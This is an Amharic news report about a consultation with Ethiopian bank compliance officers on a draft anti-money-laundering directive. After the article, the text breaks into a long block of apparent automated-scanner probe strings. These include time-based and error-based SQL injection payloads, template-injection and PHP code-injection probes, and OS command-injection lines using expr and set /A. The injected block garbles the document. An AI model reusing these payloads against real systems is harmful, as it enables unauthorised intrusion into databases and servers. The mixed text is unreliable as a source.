የባንኮች የህግ ተገዥነት ስራ ክፍል አደረጃጀትና የመረጃ ቴክኖሎጂ ስርዓት መስፈርት ረቂቅ መመሪያ ላይ ምክክር ተደረገ
በፋይናንስ ደህንነት አገልግሎት ተዘጋጅቶ በየደረጃው ግብዓት ተካቶበት በቀረበው የባንኮች የህግ ተገዥነት የስራ ክፍል አደረጃጀትና የመረጃ ግንኙነት ቴክኖሎጂ ስርዓት መስፈርት ረቂቅ መመሪያ ላይ ከባንኮች የህግ ተገዥነት ስራ ክፍል ከተውጣጡ አመራሮች ጋር የካቲት 18 ቀን 2016 ዓ.ም በአዲስ አበባ ምክክር ተደረገ።
በወንጀል ድርጊት የተገኘ ገንዘብ ወይም ንብረት ህጋዊ አስመስሎ ማቅረብና ሽብርተኝነትን በገንዘብ የመርዳት ወንጀሎችን ለመከላከልና ለመቆጣጠር በወጣው አዋጅ ቁጥር 780/2005 እንዲሁም ጅምላ ጨራሽ መሳሪያዎችን ብዜት በገንዘብ መርዳትን ለመከላከልና ለመቆጣጠር በወጣው አዋጅ ቁጥር 1132/2011 በኢትዮጵያ ውስጥ የሚሰሩ ባንኮች በዋናነት ወንጀሎቹን በመከላከልና ረገድ ትልቅ ኃላፊነት የተጣለባቸው በመሆናቸው ይህኑን ኃላፊነታቸውን በብቃት ለመወጣት የህግ ተገዥነት የስራ ክፍልን በተገቢው ደረጃ ማደራጀትና መደገፍ ይጠበቅባቸዋል።
ወንጀሎቹን የመከላከልና የመቆጣጠር ስራ የሁሉም ጉዳዩ የሚመለከታቸው አካላት ልዩ ትኩረት የሚጠይቅ ቢሆንም እስካሁን ባለው ሁኔታ በወንጀል ተግባር የተገኘ ገንዘብ/ንብረት ህጋዊ አስመስሎ ማቅረብና ሽብርተኝነትን በገንዘብ የመርዳት ወንጀሎች መከላከል በተመለከተ የባንኮች የህግ ተገዥነት ስራ ክፍሎች ከአደረጃጀት፣ ከሰው ሃይል እና ከቴክኖሎጂ አቅርቦት አኳያ በተለያየ ደረጃ ላይ በመሆናቸው ዝቅተኛውን የአደረጃጀትና የመረጃ ቴክኖሎጂ መስፈርት መመሪያ ማዘጋጀት አስፈላጊ እንደሆነ ተገልጿል።
የፋይናንስ ደህንነት አገልግሎት የሱፐርቪዥንና ኮምፕሊያንስ ዘርፍ ምክትል ዋና ዳይሬክተር አቶ ብሌን ጊዜወርቅ የምክክር መድረኩን አስመልክተው ባደረጉት ንግግር የረቂቅ መመሪያው ዋና አላማ የባንኮች የወንጀል መከላከል አቅም በቴክኖሎጂና በሰው ሃይል እንዲጠናከር ምቹ ሁኔታ መፍጠር መሆኑን ገልጸው ይህም የተቋማቱን ኮምፕሊንስና ህግ ማስከበር ስራ ውጤታማ ማድረግ መሆኑን አብራርተዋል።
ለምክክር የቀረበው ረቂቅ መመሪያ ላይ ከተለያዩ ባንኮች የተውጣጡ አመራሮችና ባለሙያዎች የማሻሻያ እንዲሁም በአፈፃፀም ላይ ሊታዩ ስለሚገባቸው ሀሳቦችና ግብዓቶች የቀረቡ ሲሆኑ ረቂቅ መመሪያው የበለጠ ዳብሮ እና በየደረጃው ተጨማሪ ውይይት እንደሚደረግበት ተገልጿል።
በወንጀል ድርጊት የተገኘ ገንዘብ ወይም ንብረት ህጋዊ አስመስሎ ማቅረብና ሽብርተኝነትን በገንዘብ የመርዳት ወንጀሎችን ለመከላከልና ለመቆጣጠር በወጣው አዋጅ 780/2005 አንቀጽ 13 (4) መሰረት “የፋይናንስ ተቋማትና ፋይናንስ ነክ ያልሆኑ የተሰየሙ የንግድና የሙያ ስራዎች በወንጀል ድርጊት የተገኘ ገንዘብ ወይም ንብረት ህጋዊ አስመስሎ ማቅረብና ሽብርተኝነትን በገንዘብ ከመርዳት ጋር የተያያዙ በዚህ አዋጅ የተለመከቱ ግዴታዎቻቸውን ለመወጣት የሚረዷቸው የአሠራር መመሪያዎችን” እንደሚያወጣ ተደንግጎ ይገኛል።
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('l',2)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('v',0)
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
(select*from(select+sleep(2)union/**/select+1)a)
(select*from(select+sleep(0)union/**/select+1)a)
123456"and"f"="x
123456"and"h"="h
123456'and'g'='n
123456'and'u'='u
123456/**/and+2=6
123456/**/and+2=2
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'"\(
expr 916812633 + 867351585
123456
123456
123456鎈'"\(
123456&set /A 933902752+813428495
123456
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1798380027')))>'0
123456
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1963102145')))
123456
<%- 980417645+882115084 %>
123456/**/and/**/cast(md5('1589135485')as/**/int)>0
123456
#set($c=868200935+952647955)${c}$c
123456'and(select'1'from/**/cast(md5(1441563616)as/**/int))>'0
123456
'-var_dump(md5(107093185))-'
${(925213523+903996313)?c}
extractvalue(1,concat(char(126),md5(1107754202)))
123456
${@var_dump(md5(716327432))};
123456$(expr 881694714 + 886333648)
${945551640+972542113}
123456"and/**/extractvalue(1,concat(char(126),md5(1688893256)))and"
123456
123456|expr 892855233 + 858360503
/*1*/{{826162363+933724832}}
123456
${971090505+818428819}
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1363454458)))and'
123456 expr 813787651 + 865342704
kdgnymakjpqqmhxjrknq
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456